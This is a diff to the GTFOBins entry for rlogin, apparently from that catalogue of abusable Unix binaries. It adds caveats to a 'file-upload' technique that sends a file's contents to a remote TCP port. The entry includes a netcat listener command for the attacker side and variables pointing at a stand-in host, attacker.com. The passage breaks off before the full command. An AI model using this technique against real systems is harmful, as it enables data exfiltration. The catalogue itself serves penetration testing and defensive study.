diff --git a/_gtfobins/rlogin.md b/_gtfobins/rlogin.md index 5b1d393..8e17f30 100644 --- a/_gtfobins/rlogin.md +++ b/_gtfobins/rlogin.md @@ -1,7 +1,14 @@ --- +description: | + Usually `rlogin` is a symlink to `ssh`, the following works only when the *real* `rlogin` is used (e.g., from the `rsh-client` APT package). functions: file-upload: - - description: Send contents of a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker system to capture the contents. + - description: | + Send contents of a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker system to capture the contents. + + `rlogin` hangs waiting for the remote peer to close the socket. + + The file is corrupted by leading and trailing spurious data. code: | RHOST=attacker.com RPORT=12345